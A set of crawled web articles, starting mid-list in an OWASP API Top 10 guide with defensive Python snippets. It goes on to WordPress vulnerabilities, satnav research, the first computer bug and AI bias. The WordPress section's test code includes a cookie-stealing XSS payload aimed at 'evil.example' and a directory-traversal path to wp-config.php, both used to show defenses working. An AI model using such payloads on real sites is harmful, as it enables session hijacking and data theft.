- API endpoints that use GET parameters to send sensitive information
- Missing or improper validation of JWT access tokens
- Authorization flaws that make the endpoint susceptible to credential stuffing and brute-force attacks
- Weak/poorly managed passwords
APIs with broken user authentication allow malicious hackers to assume the identities of legitimate users, opening the door to deeper, more sophisticated attacks.
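On the validation side, every token should have its signature and expiry checked on each request. The following simplified, HMAC-signed token is a teaching sketch only — a real API should use a vetted JWT library rather than hand-rolled code:

```python
import base64
import hashlib
import hmac
import json
import time

def sign_token(payload, secret):
    """Serialize a payload and append an HMAC-SHA256 signature."""
    body = base64.urlsafe_b64encode(json.dumps(payload).encode())
    sig = hmac.new(secret, body, hashlib.sha256).hexdigest().encode()
    return body + b"." + sig

def verify_token(token, secret, now=None):
    """Return the payload only if the signature and expiry check out."""
    body, _, sig = token.partition(b".")
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(sig, expected):  # constant-time compare
        raise ValueError("bad signature")
    payload = json.loads(base64.urlsafe_b64decode(body))
    if payload["exp"] < (now if now is not None else time.time()):
        raise ValueError("token expired")
    return payload
```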
Excessive Data Exposure
APIs often rely on client UIs to filter the data returned when serving user requests. When a user requests a resource, the API returns the full data object stored in the application. The client application then filters the response to show only the information that the user is meant to view.

Unfortunately, developers often mistakenly implement APIs as generic data sources. This allows attackers to call the API directly and access the data that the client UI is supposed to filter out. Depending on the data exposed, attackers can carry out a breach or use the exposed data to gain elevated privileges.
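A common mitigation is to serialize responses through an explicit allow-list on the server rather than trusting the client UI to filter. A Python sketch, where the field names are illustrative assumptions:

```python
PUBLIC_USER_FIELDS = ("id", "display_name")

def serialize_user(record):
    """Return only the fields a client is meant to see.

    Returning the raw database record would leak fields such as
    password_hash or internal flags to any API caller.
    """
    return {field: record[field] for field in PUBLIC_USER_FIELDS}
```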
Lack of Resource and Rate Limiting
Some APIs lack a default mechanism to limit the frequency and number of requests from a specific client. Hackers exploit this by crafting requests that upload or modify large files, or by flooding the API with requests until the host is overwhelmed.

In such cases, the API host can run out of memory, network bandwidth, and CPU, or suffer buffer overflows. This increases the API's response time and reduces the number of clients it can handle, often leading to a denial of service.
Mass Assignment
Mass assignment occurs when an API binds client-provided data to internal objects without appropriate filtering. Developers use binding methods to speed up development cycles, with functions that bind user input directly to internal objects and code variables.
Attackers perform reconnaissance to assess the API structure and object relations, then exploit mass assignment vulnerabilities to update and modify the properties of objects meant to be hidden. Once they have modified the properties of sensitive objects, attackers can escalate privileges, bypass security checks, and tamper with sensitive data.
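The standard defense is to bind only an explicit allow-list of fields from the request payload. A Python sketch, with illustrative field names:

```python
ALLOWED_PROFILE_FIELDS = {"display_name", "bio"}

def bind_profile(profile, payload):
    """Copy only allow-listed keys from untrusted input onto the object.

    A naive `profile.update(payload)` would let an attacker set
    hidden properties such as `is_admin` via mass assignment.
    """
    for key in payload.keys() & ALLOWED_PROFILE_FIELDS:
        profile[key] = payload[key]
    return profile
```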
Security Misconfiguration
Misconfigurations within API resources, transport protocols, or application infrastructure can facilitate security breaches. Common examples include:
- Usage of default configuration with no or weak authentication
- No enforcement of HTTPS
- Unnecessary HTTP methods
- Misconfigured HTTP headers
- Data corruption through unsanitized inputs
- Data leakage
- Open cloud storage
- Verbose error messages
- Ad-hoc configurations
- Misconfigured cross-origin resource sharing (CORS)
Injection
An API endpoint generally consumes user data as request parameters or within its URL. When an endpoint has no built-in mechanism to distinguish untrusted user data, attackers can inject malicious input into the application. Attackers can also supply this untrusted data as part of a command or query, tricking the application into executing it to gain access to sensitive data.
Lack of proper input data validation can result in injection attacks, including data leakage, privilege escalation, or denial of service. Common command injection flaws include SQL Injection with API parameters, OS commands injection, cross-site scripting, etc.
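Parameterized queries are the standard defense against SQL injection: the database driver treats user input strictly as data, never as query structure. A runnable sketch using Python's built-in sqlite3 module:

```python
import sqlite3

def find_user(conn, username):
    """Look up a user with a bound parameter.

    The driver treats `username` strictly as data, so input like
    "' OR '1'='1" cannot change the structure of the query.
    """
    cur = conn.execute(
        "SELECT name FROM users WHERE name = ?", (username,)
    )
    return cur.fetchall()
```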
Improper Assets Management
With rapid delivery cycles characterizing the development of modern applications, DevOps teams frequently deploy more APIs into production, raising asset management issues. First, the desire for backward compatibility forces DevOps teams to leave old versions of APIs in operation.
Attackers commonly target such older versions to take advantage of outdated security checks. Other APIs may not conform to data governance policies, making them key entry points for data exposure.
Insufficient Logging & Monitoring
Most API attacks occur over a period of time, with the attacker performing reconnaissance, taking the time to explore vulnerabilities, and plan the right attack strategies. With the correct logging and monitoring mechanisms, developer teams can identify malicious actions as soon as they are initiated.
Unfortunately, most organizations implement proper logging for server and network events but commonly lack the mechanisms for adequate API-specific logging. A key reason for this is developers’ lack of insight into API usage.
As a result, developers fail to record events such as input validation failures, failed authentication checks, and other application errors that would indicate invalid access. In the absence of such alerts, attackers can stay undetected for extended periods, enabling them to exploit the system fully.
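API-specific logging can start very small: record each failed authentication check with its source, and flag sources that cross a threshold. A Python sketch, where the threshold and field names are illustrative assumptions:

```python
import logging
from collections import Counter

log = logging.getLogger("api.audit")

class AuthFailureMonitor:
    """Count failed logins per source IP and flag suspicious ones."""

    def __init__(self, alert_threshold=5):
        self.alert_threshold = alert_threshold
        self.failures = Counter()

    def record_failure(self, source_ip, username):
        """Log the event; return True when the source should be alerted on."""
        self.failures[source_ip] += 1
        log.warning("auth failure ip=%s user=%s", source_ip, username)
        return self.failures[source_ip] >= self.alert_threshold
```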
Best Practices for API Security
While there are inherent challenges and a continuously evolving threat landscape, organizations can embrace the right combination of best practices and security tools to maintain robust API security. Some best practices for securing APIs include:
Create and Update an API Inventory
To correctly manage and secure APIs, cross-functional teams should be aware of the number and identity of every API their organization owns and uses. Developers should also routinely discover and update API inventories by conducting perimeter scans. Furthermore, the operations team should share such inventory details to ensure the API assets are accounted for correctly.
Implement Strong Encryption Mechanisms
Data transfer between the API server and clients should be encrypted to prevent the interception of user requests and application responses. Strong encryption algorithms are considered one of the most robust methods to mitigate many attacks, such as man-in-the-middle or brute force attacks.
Use Quotas and Throttling to Limit Requests
Establishing quotas and setting thresholds helps prevent denial-of-service attacks by limiting the number of requests a client can submit over a period of time. Throttling temporarily limits how quickly the system responds to a client's API calls: when a throttle is triggered, the user remains logged in, but their requests are served at a reduced rate.
Enforce Strong Authentication & Authorization Strategies
Use robust authentication mechanisms, such as multi-factor authentication, JWT access tokens, and the OAuth protocol to verify the identity of request origins. Developers should also use the principle of least privilege and role-based access control, among other proper authorization mechanisms, to manage permissions once a user is logged in.
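The principle of least privilege with role-based access control can be sketched as a permission check attached to each handler. The roles and permission names below are illustrative assumptions, not from any specific framework:

```python
ROLE_PERMISSIONS = {
    "viewer": {"read"},
    "editor": {"read", "write"},
    "admin": {"read", "write", "delete"},
}

def require_permission(permission):
    """Decorator: refuse the call unless the user's role grants it."""
    def decorator(handler):
        def wrapper(user, *args, **kwargs):
            granted = ROLE_PERMISSIONS.get(user["role"], set())
            if permission not in granted:
                raise PermissionError(permission)
            return handler(user, *args, **kwargs)
        return wrapper
    return decorator

@require_permission("delete")
def delete_record(user, record_id):
    return f"deleted {record_id}"
```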
API Scanner for Vulnerabilities
Security teams should consider a scanning solution that automatically discovers known vulnerabilities in applications to reduce the risk of being hacked through the API. The Crashtest Security Suite is a comprehensive API vulnerability scanning tool built to fit seamlessly into the DevOps toolchain, making it easier to integrate API vulnerability scanning into the development workflow. Create an account and get a free, 2-week trial to start scanning your APIs in minutes.
What tests can I run to ensure secure APIs?
When creating security tests for APIs, developers should build varied scenarios that address the OWASP top 10 vulnerabilities. Specific scenarios can cover user authentication, parameter tampering, injection, unhandled HTTP methods, and fuzz testing.
What are API security schemes?
API security schemes help developers implement robust, time-tested access control when building APIs. Popular supported schemes include API keys, basic authentication, and OpenID Connect (OIDC).
Which changes are expected for the future list?
The OWASP API Security list of top 10 vulnerabilities is constantly changing based on evolving trends of cyber attacks and development techniques. Therefore, the forthcoming list may contain combinations of current and newly identified vulnerabilities, with recent entrants including data integrity failures, insecure design, and cryptographic failures. | <urn:uuid:6403e5e7-a3f2-46ff-8d24-91cc2bee72c9> | CC-MAIN-2022-40 | https://crashtest-security.com/owasp-api-top-10/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00694.warc.gz | en | 0.876149 | 2,212 | 2.703125 | 3 |
The WordPress content management system (CMS) is popular with communities, e-commerce stores, educational websites, and blogs because of its flexibility and support for various use cases. The free, open-source CMS is also supported by advanced plugins that enable users to customize the look and feel of their websites.
Besides this, WordPress is supported by a global community of volunteers who develop plugins and themes, making it easy to learn, adapt and scale quickly.
While it is convenient and reliable for most website projects, WordPress requires strict observation of best practices to keep sites secure. In addition, since WordPress runs on open-source code, thousands of contributors take time to find, identify and fix WordPress security issues.
However, tackling a WordPress security issue most often requires deep analysis, the adoption of best practices, and the right tools to mitigate risks.
This article delves into commonly found WordPress security issues and the best methods to avoid them. Further information about web security basics for beginners can be found on our blog.
WordPress Security Vulnerabilities and Risks
WordPress is widely popular, powering approximately 40% of global websites as of 2021. Even though the platform is built to be secure, security vulnerabilities are commonly found and arise due to users’ actions or site administrators’ malpractices. Since vulnerabilities typically exist in themes and plugins, securing a WordPress website often goes beyond securing the core WordPress source code.
Brute Force Attacks
Each WordPress site has a default login page (http://www.example.com/wp-admin) for administrator accounts. Attackers exploit this by trying to gain administrator privileges for the website. Considered one of the most common forms of WordPress attacks, brute force attacks are initiated by hackers trying to guess user credentials using sophisticated techniques and automation.
Since they do not rely on existing vulnerabilities, brute force attacks are one of the simplest ways to compromise user accounts. Many administrators use weak passwords, which makes it easy for programmed bots to guess credentials and obtain privileged user roles.
In a successful brute-force WordPress attack, attackers can steal user data, install malware, or take down a crucial service. Even if they never successfully log in, hackers carrying out brute force attacks can cause a denial of service by attempting thousands of simultaneous logins.
These attacks are also difficult to identify since the bots use different locations and IP addresses for login attempts, which allows them to persist without detection. While it is a trial and error method, a brute force attack is widely popular and was involved in over 80% of the attacks on WordPress websites in 2018.
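A common hardening step against brute force is to limit failed login attempts per account — in WordPress this is usually done with a plugin, but the core logic is simple enough to sketch in Python (the thresholds below are illustrative assumptions):

```python
class LoginThrottle:
    """Lock an account out after `max_failures` bad attempts."""

    def __init__(self, max_failures=5, lockout_seconds=900):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.state = {}  # username -> (failure_count, last_failure_time)

    def is_locked(self, username, now):
        count, last = self.state.get(username, (0, 0.0))
        return count >= self.max_failures and now - last < self.lockout_seconds

    def record_failure(self, username, now):
        count, _ = self.state.get(username, (0, 0.0))
        self.state[username] = (count + 1, now)
```

The login handler would consult `is_locked()` before checking the password at all, which also blunts the denial-of-service effect of mass simultaneous login attempts.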
Cross-Site Scripting (XSS) Attacks
In an XSS attack, hackers exploit existing WordPress vulnerabilities to inject malicious code into the website. These attacks mainly aim to steal users' identification information by hijacking their sessions and executing unwanted scripts on the client side.
In a typical XSS attack, a hacker utilizes a user input form to insert the malicious URL/string into the website’s database. When a victim requests a page from the site, the web server’s response includes the malicious script sent to the victim’s browser. When the browser executes this script, it sends the user’s session cookies to the hacker’s machine.
WordPress XSS vulnerabilities remain a critical challenge for web security teams since they are exploited differently, making them hard to identify and mitigate on time. For this purpose, there are various tools that you can use to detect XSS attacks and take action against them.
Various types of XSS vulnerabilities include:
- Stored cross-site scripting, also known as Persistent XSS, is the most alarming type of XSS that relies on malicious scripts to be permanently stored on the website’s database. This implies that whenever any user requests a site page, the malicious payload is sent to the user’s browser as part of the HTML response.
- Reflected cross-site scripting, also known as non-persistent XSS, involves a malicious script sent along with the user’s request. A successful attack typically requires the attacker to send the malicious script to each user separately. The script is then ‘reflected’ back such that the web server’s HTTP response includes the malicious payload sent as part of the request. In this case, attackers use social engineering, such as phishing links, to deceive users into sending the malicious script to the web server.
- In DOM-based XSS attacks, hackers inject malicious payloads when the website’s client-side scripts write user-provided data to the Document Object Model (DOM). A common cause of this vulnerability is developers not including additional security measures to handle data correctly. Once injected, the malicious payload is executed when the browser reads the data back from the DOM.
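The common defense against all three variants is to treat user input strictly as data and escape it before rendering. The sketch below illustrates the idea in Python using the standard library’s `html.escape`; WordPress itself provides analogous escaping helpers such as `esc_html()`:

```python
import html

def render_comment(author, body):
    """Build an HTML fragment, escaping user-supplied values so that an
    embedded <script> payload is rendered as inert text."""
    return "<p><b>{}</b>: {}</p>".format(html.escape(author), html.escape(body))

# A classic session-stealing payload is neutralized on output.
payload = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'
safe = render_comment("guest", payload)
assert "<script>" not in safe          # the tag can no longer execute
assert "&lt;script&gt;" in safe        # it is displayed as plain text
```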
File Inclusion Exploits
WordPress file inclusion exploits affect websites that utilize a scripting runtime, allowing hackers to upload files to the WordPress server, submit input into files or modify file permissions.
Attackers use a configuration file to enumerate the system, provide download functionality, and allow access for undefined user roles. In the absence of sufficient user input validation, attackers also use dynamic file inclusion capabilities to include a file on the server.
WordPress file inclusion exploits are categorized as:
- Local file inclusion (LFI) – These vulnerabilities enable hackers to include files on the server using their web browser. LFI exploits are easily performed on websites that accept files without properly sanitizing user input. An attacker can modify the input so that they inject special characters into the path and access other files hosted on the webserver. In most WordPress applications, successful LFI exploits occur due to insufficient validation of the Ajax path parameter when requesting the Ajax shortcode pattern.php script.
- Remote file inclusion (RFI) – Attackers leverage RFI vulnerabilities to include remote files on the webserver. These attacks are less common and are carried out on websites that dynamically include external scripts and files. If the application receives an arbitrary file through an unsanitized path, it creates an attack surface, leading to information theft, XSS attacks, and remote code execution attacks.
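The usual mitigation for both LFI and RFI is strict path validation before any file is included. A hedged Python sketch of the principle (the directory name and rules here are illustrative, not WordPress internals):

```python
import posixpath

ALLOWED_DIR = "/var/www/html/uploads"   # hypothetical base directory

def safe_include_path(user_supplied, base=ALLOWED_DIR):
    """Resolve a user-supplied filename, rejecting remote URLs (RFI)
    and anything that escapes the allowed directory (LFI traversal)."""
    if "://" in user_supplied:
        raise ValueError("remote paths not allowed")
    resolved = posixpath.normpath(posixpath.join(base, user_supplied))
    if not resolved.startswith(base + "/"):
        raise ValueError("path escapes allowed directory")
    return resolved
```

With this check, a traversal payload such as `../../wp-config.php` normalizes to a path outside the allowed directory and is rejected.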
Malware
With the popularity of WordPress, there is a plethora of malicious software that disrupts how users interact with the website. Common variations of malware for WordPress websites include:
- Viruses – Software that replicates by injecting malicious code into other applications. Attackers use viruses to affect the website’s core functionality or add spam content that degrades the user experience.
- Trojan horse – Hackers use Trojan horses to perform a wide range of malicious actions for a WordPress website, including corrupting the wp-config.php file and FTP files and exploiting the system’s resources.
- Ransomware – Some attacks, like the WannaCry attack, make WordPress websites inaccessible until the hackers are paid to remove the malicious software. This can have catastrophic effects, including loss of revenue, tarnished reputation, and penalties from compliance authorities.
Other malware that compromises WordPress websites includes cryptocurrency mining bots, adware, and spyware.
SQL Injection: The Major Security Issue for WordPress Sites
Attackers could use malicious SQL statements to compromise the database of WordPress websites, orchestrating SQL injection attacks. They inject SQL codes in stealth mode via the data accepted and transmitted from the website. This commonly involves using an input field to supply masked queries that contain special characters.
These characters are used by the SQL interpreter to execute external commands. Common entry points for WordPress SQLi attacks include feedback fields, search bars, shopping carts, login forms, signup forms, and contact submission forms.
The WordPress CMS uses SQL-based databases, making SQLi attacks a standard mode of exploitation. Since all the forums, blogs, and websites have input interfaces that accept user data, most WordPress sites have at least one known SQL injection point.
In addition, many SQLi vulnerability scanning tools are available online, making it easy for attackers to get started on the exploit. In successful SQLi attacks, the hackers gain complete control of the database, thereby leading to deeper penetration of the system and the exposure of sensitive data.
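Parameterized queries are the standard SQLi defense: the query structure is fixed before any user data is bound. An illustrative Python/SQLite sketch of the principle (WordPress exposes the same idea through `$wpdb->prepare()`):

```python
import sqlite3

# Illustrative sketch using SQLite; the same principle applies to the
# MySQL database behind WordPress.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def find_user(conn, name):
    # The ? placeholder binds the input as data, so a payload such as
    # "' OR '1'='1" cannot change the query's structure.
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)
    ).fetchall()

# The legitimate lookup works; the classic injection payload returns nothing.
assert find_user(conn, "alice") == [("alice",)]
assert find_user(conn, "' OR '1'='1") == []
```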
The Importance of Finding WordPress Security Issues for Business
As an open-source platform, WordPress allows almost anyone to contribute to its core software. While this openness offers flexibility, it also raises concerns regarding the security of the platform’s overall construct.
Identifying and fixing vulnerabilities before they make it to production helps security teams avoid the expenses of recovering from a breach. Businesses also avoid the hefty penalties and fines compliance authorities charge for exposing private information.
Addressing WordPress security issues also helps protect the firm’s reputation since safeguarding customer data is known to maintain a competitive edge. Furthermore, every additional security measure helps administrators operate websites without compromising business relationships.
Protecting access credentials and addressing WordPress vulnerabilities requires robust practices that protect all platform layers, including the core WordPress functionality, external themes and plugins, and the underlying infrastructure.
Why do WordPress sites have vulnerabilities?
Various factors make WordPress websites susceptible to attack. These include:
Use of an outdated theme, plugin, or core
Using outdated versions increases the chance of successful exploits since version updates include fixes for known vulnerabilities in the code. WordPress rolls out new versions every three months, so it is important to check for the stable version update list to ensure the website’s components are up to date.
Use of common and weak passwords
The WordPress admin login is one of the most highly targeted threat vectors since it grants the highest possible privileges. Some WordPress users set up the admin portal with common passwords that are easy to guess and are naturally more susceptible to exploits.
In cases where the admin user ID is admin, it is even easier to brute-force a login, since bots only need to guess the password and can get through with fewer attempts.
A compromised admin account makes it easy to orchestrate a data breach on the website and is the most commonly known first level of penetration for full-blown attacks.
WordPress security plugins
WordPress security plugins help administrators manage the complex aspects of WordPress security and streamline security measures, compliance, and audit. Some popular security plugins for WordPress include:
iThemes Security plugin
iThemes is one of the most popular security plugins for WordPress websites as it offers multiple levels of security enhancements for robust threat management. The iThemes platform includes advanced controls such as multi-factor authentication, passwordless logins, and auto-administering strong password requirements to reduce the likelihood of a hack through a privileged account.
The platform also helps prevent automated brute-force logins by tracking login activity, then blocking the login screen in case of suspicious login attempts. The iThemes plugin also logs important security events for the WordPress website, highlighting unwanted changes to indicate a breach.
Sucuri Security plugin
Sucuri is a cloud-based website security platform that helps protect WordPress sites from blacklists, malware, DDoS, and common attack vectors. With Sucuri, all website traffic is routed through the Sucuri cloud proxy Web Application Firewall (WAF) before going to the WordPress web server.
The firewall blocks all illegitimate requests and only lets in authenticated users. Sucuri has a free service, and its pro version adds advanced features such as:
- Real-time backup for all website changes
- One-click recovery
- Event and activity log
- Spam protection of all user input interfaces
- Email alerts for site unavailability
Wordfence Security plugin
Wordfence is an open-source WordPress security plugin available in two flavors: a basic version that offers baseline protection and an enterprise version with advanced security controls.
The platform has an intuitive dashboard that makes it easy to visualize and navigate different security aspects. In addition, Wordfence offers comprehensive WordPress security management and includes functions such as:
- WordPress Firewall – a WAF built to detect and block malicious traffic
- WordPress Security Scanner – investigates the core code, themes, and plugins to identify any security issues
- Login Security – enables different authentication mechanisms while blocking admin logins through compromised passwords
- Security Tools – real-time traffic monitoring, IP and country blocking
Other ways to check for WordPress vulnerability
WordPress Security Scanner
WordPress security scanners are tools that help comprehensively evaluate the hosting environment, the web server, WordPress plugins, and themes to analyze any point of compromise.
While standard security plugins offer innovative mechanisms to alert and deter attacks in progress, a security scanner is mainly used proactively to prevent future attacks by identifying system-level vulnerabilities.
Some standard functions of a WordPress security scanner include:
- Use scripts to detect WordPress plugin versions, users, and themes
- Utilize theme and plugin enumeration to map the attack surface
- Fingerprint theme and plugin versions to pinpoint known vulnerabilities
- Enumerate website usernames
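As an example of fingerprinting, many scanners read the “Stable tag” line from a plugin’s public readme.txt to identify its installed version. A small Python sketch of that parsing step (the sample text is illustrative):

```python
import re

def parse_stable_tag(readme_text):
    """Pull the version from the 'Stable tag' line of a plugin readme.txt,
    as a scanner would after fetching the file from a target site."""
    match = re.search(r"^Stable tag:\s*([\w.\-]+)",
                      readme_text, re.MULTILINE | re.IGNORECASE)
    return match.group(1) if match else None

sample = "=== Example Plugin ===\nRequires at least: 5.0\nStable tag: 2.4.1\n"
assert parse_stable_tag(sample) == "2.4.1"
```

The extracted version is then compared against a database of known vulnerabilities to pinpoint exposures.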
FAQs for WordPress security issues
WooCommerce security issues
WooCommerce is a WordPress plugin used to develop e-commerce sites. Given the sensitive nature of e-commerce transactions, security issues cannot be ignored on such sites. While WooCommerce offers off-the-shelf security and is considered a secure platform, external threats such as brute-force logins and hacking attacks are not uncommon.
Any WooCommerce store uses a typical login screen that attackers tend to access through brute-force logins. Though the platform is supported by a proactive development community that constantly adds enhancements and security patches, the changing threat landscape requires a focused approach to securing WooCommerce sites. Some best practices to secure WooCommerce sites include:
- Choosing a secure web host
- Leveraging 2FA for admin logins
- Embracing a robust firewall mechanism
- Using the right security plugins
- Enforcing policies for strong usernames and passwords
- Performing regular audits and full-stack scans
- Taking regular backups
WordPress sites hacked
Due to its consistent popularity, the WordPress CMS remains a common target for attackers, with over 74% of website attacks targeting WordPress. Hackers exploit vulnerabilities across all layers and components of a stack, including the core platform, plugins, or themes. According to a recent report, about 75% of WordPress attacks were through third-party plugins, 14% were on the core functionality, and 11% were on outdated themes.
Some examples of successful WordPress attacks from the recent past include:
- Attack on the “File Manager” WordPress plugin
- The 1 million site breach of 2020
- The Responsive Menu breach
What is the best WordPress firewall plugin?
Firewall plugins (WAFs) help to filter all incoming traffic to your website. The most appropriate plugin differs for every use case; however, the right firewall platform must include a few basic features, such as:
- Intrusion detection
- Brute force prevention
- Blacklist removal services
- Malware detection and elimination
- DNS-level firewall | <urn:uuid:189f5a3f-9db3-4a31-835a-32b73b8a264b> | CC-MAIN-2022-40 | https://crashtest-security.com/wordpress-security-vulnerabilities/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00694.warc.gz | en | 0.888366 | 3,066 | 2.75 | 3 |
LONDON (Reuters) – If you have long feared that using a “satnav” navigation system to get to your destination is making you worse at finding the way alone, research now suggests you may be right. Scientists studying what satnavs do to the brain have found that using them effectively switches off parts of the brain that would otherwise be utilized to simulate different routes and boost navigational skills.
Publishing the findings in the journal Nature Communications on Tuesday, the researchers said that when volunteers in an experiment navigated manually, their hippocampus and prefrontal cortex brain regions had spikes of activity. But these were not seen when the volunteers simply followed satnav instructions.
“When we have technology telling us which way to go … these parts of the brain simply don’t respond to the street network,” said Hugo Spiers of University College London’s (UCL) department of experimental psychology.
“In that sense our brain has switched off its interest in the streets around us.”
The researchers said constant use of satnavs would probably have longer-term limiting effects, making users less able to learn and navigate a city’s street network unaided.
“Understanding how the environment affects our brain is important,” said Amir-Homayoun Javadi, who worked on the UCL study before moving to the University of Kent. “Satnavs clearly have their uses and their limitations.”
As an extension of the research, the scientists also analysed the street networks of major cities around the world to visualise how easy they may be to navigate.
London, with its complex network of small streets, appears to be particularly taxing on the hippocampus, they said.
By contrast, far less mental effort may be needed to navigate Manhattan in New York, where a grid layout means that at most junctions the choice is only between straight, left or right.
(By Kate Kelland; Editing by Ed Osmond) | <urn:uuid:e2211f58-cd36-47cb-b398-b543097475c1> | CC-MAIN-2022-40 | https://disruptive.asia/satnavs-erasing-brains-ability-navigate/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00694.warc.gz | en | 0.943287 | 408 | 3.390625 | 3 |
Let’s talk a little bit about a behavior called transverse orientation. No, this isn’t a technology term or anything that you should be that familiar with, unless you buzz around at night in odd patterns.
Transverse orientation is how some insects navigate. They do this by flying at relative angles in relation to distant light sources.
Before electricity, these winged-pests would traverse the night’s sky using the light of the moon. It was simple—there was only one light source.
Today, however, these little buggers get understandably confused—which is why they fly into your house the moment you open your door, despite being uninvited.
Why am I talking so much about insects on a technology blog? So that we can better understand the origin of the technology term, bug—of course.
More specifically, did you know that the very first instance of a computer bug was recorded at 3:45 pm on September 9, 1947?
It was a moth, and it’s been preserved behind some adhesive tape for nearly 70 years.
That’s right, a moth—the very first computer bug!
Grace Hopper, a member of Harvard’s programming team working on the Mark II Aiken Relay Calculator, was working late at night with the windows open (no screens). The moth—roughly four inches in wingspan—was attracted by the light of the room and heat of the calculator and nestled its way into the machine…where it was beaten to death by one of the relays.
Hopper’s team took the bug out of the relay, taped it to their logbook and labeled it as the “first actual case of a bug being found.”
While the term “bug” had been used before in regard to problems with machines and engineering, most famously by Thomas Edison, Hopper’s team popularized the terms “bug” and “debug” as part of the computer programming vernacular.
So the next time you encounter a bug while playing a game, or coding your next project, be glad you don’t have to pull out an actual dead moth from your computer (although that does sound easier, doesn’t it?). | <urn:uuid:1b610eff-aa88-4a1d-a7bf-8db24faf5971> | CC-MAIN-2022-40 | https://www.colocationamerica.com/blog/first-computer-bug | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00694.warc.gz | en | 0.957812 | 475 | 3.46875 | 3 |
From facial recognition for unlocking our smartphones to speech recognition and intent analysis for voice assistance, artificial intelligence is all around us today. In the business world, AI is helping us uncover new insight from data and enhance decision-making.
For example, online retailers use AI to recommend new products to consumers based on past purchases. And, banks use conversational AI to interact with clients and enhance their customer experiences.
However, most of the AI in use now is “narrow AI,” meaning it is only capable of performing individual tasks. In contrast, general AI – which is not available yet – can replicate human thought and function, taking emotions and judgment into account.
General AI is still a way off so only time will tell how it will perform. In the meantime, narrow AI does a good job at executing tasks, but it comes with limitations, including the possibility of introducing biases.
AI bias may come from incomplete datasets or incorrect values. Bias may also emerge through interactions overtime, skewing the machine’s learning. Moreover, a sudden business change, such as a new law or business rule, or ineffective training algorithms can also cause bias. We need to understand how to recognize these biases, and design, implement and govern our AI applications in order to make sure the technology generates its desired business outcomes.
Recognize and evaluate bias – in data samples and training
One of the main drivers of bias is the lack of diversity in the data samples used to train an AI system. Sometimes the data is not readily available or it may not even exist, making it hard to address all potential use cases.
For instance, airlines routinely apply sensor data from in-flight aircraft engines through AI algorithms to predict needed maintenance and improve overall performance. But if the machine is trained with only data from flights over the Northern Hemisphere and then applied to a flight across sub-Saharan Africa, the conditions will provide inaccurate results. We need to evaluate the data used to train these systems and strive for well-rounded data samples.
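A simple first check for such gaps is to measure how each group is represented in the training data. An illustrative Python sketch (the threshold and labels are hypothetical):

```python
from collections import Counter

def representation_report(labels, threshold=0.10):
    """Return the share of each class that falls below the minimum
    representation threshold: a quick check for skewed samples."""
    counts = Counter(labels)
    total = sum(counts.values())
    return {cls: n / total for cls, n in counts.items() if n / total < threshold}

# Flight data skewed toward one hemisphere: the 5% "south" slice is flagged.
labels = ["north"] * 95 + ["south"] * 5
assert representation_report(labels) == {"south": 0.05}
```

Flagged classes signal where more data must be collected before the model can be trusted on those conditions.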
Another driver of bias is incomplete training algorithms. For example, a chatbot designed to learn from conversations may be exposed to politically incorrect language. Unless trained not to, the chatbot may start using the same language with consumers, which Microsoft unfortunately learned in 2016 with its now-defunct Twitter bot, “Tay.” If a system is incomplete or skewed through learning like Tay, then teams have to adjust the use case and pivot as needed.
Rushed training can also lead to bias. We often get excited about introducing AI into our businesses so naturally want to start developing projects and see some quick wins.
However, early applications can quickly expand beyond their intended purpose. Given that current AI cannot cover the gamut of human thought and judgement, eliminating emerging biases becomes a necessary task. Therefore, people will continue to be important in AI applications. Only people have the domain knowledge – acquired industry, business, and customer knowledge – needed to evaluate the data for biases and train the models accordingly.
Diversify datasets and the teams working with AI
Diversity is the key to mitigating AI biases – diversity in the datasets and the workforce working day to day with the models. As stated above, we need to have comprehensive, well-rounded datasets that can broadly cover all possible use cases. If there is underrepresented or disproportionate internal data, such as if the AI only has homogenous datasets, then external sources may fill in the gaps in information. This gives the machine a richer pool of data to learn and work with – and leads to predictions that are far more accurate.
Likewise, diversity in the teams working with AI can help mitigate bias. When there is only a small group within one department working on an application, it is easy for the thinking of these individuals to influence the system’s design and algorithms. Starting with a diverse team or introducing others into an existing group can make for a much more holistic solution. A team with varying skills, thinking, approaches and backgrounds is better equipped to recognize existing AI bias and anticipate potential bias.
For example, one bank used AI to automate 80 percent of its financial spreading process for public and private companies. It involved extracting numbers out of documents and formatting them into templates, while logging each step along the way. To train the AI and make sure the system pulled the right data while avoiding bias, the bank relied on a diverse team of experts with data science, customer experience, and credit decisioning expertise. Today, it applies AI to spreading on 45,000 customer accounts across 35 countries.
Consider emerging biases and preemptively train the machine
While AI can introduce biases, proper design (including the data samples and models) and thoughtful usage (such as governance over the AI’s learning) can help reduce and prevent them. And, in many situations, AI can actually minimize bias that would otherwise be present in human decision-making. An objective algorithm can compensate for the natural bias that a human might introduce such in approving a customer for a loan based on their appearance.
In recruiting, an AI program can review job descriptions to eliminate unconscious gender biases by flagging and removing words that may be construed as more masculine or feminine, and replacing them with more neutral terms. It is important to note that a domain expert needs to go in and make sure the changes are still accurate, but the system can recognize things that people could miss.
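A toy Python sketch of that flag-and-replace idea (the word list and substitutions here are illustrative examples, not a vetted lexicon):

```python
# Map words often perceived as gender-coded to neutral alternatives.
NEUTRAL_REPLACEMENTS = {
    "ninja": "expert",
    "rockstar": "skilled professional",
    "dominant": "leading",
    "nurturing": "supportive",
}

def neutralize(text):
    """Flag coded words in a job description and substitute neutral terms."""
    flagged = []
    words = text.split()
    for i, w in enumerate(words):
        key = w.lower().strip(".,!?")
        if key in NEUTRAL_REPLACEMENTS:
            flagged.append(key)
            words[i] = NEUTRAL_REPLACEMENTS[key]
    return " ".join(words), flagged

rewritten, flagged = neutralize("Seeking a dominant coding ninja for our sales team")
assert flagged == ["dominant", "ninja"]
assert rewritten == "Seeking a leading coding expert for our sales team"
```

As the article notes, a domain expert should still review the changes for accuracy.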
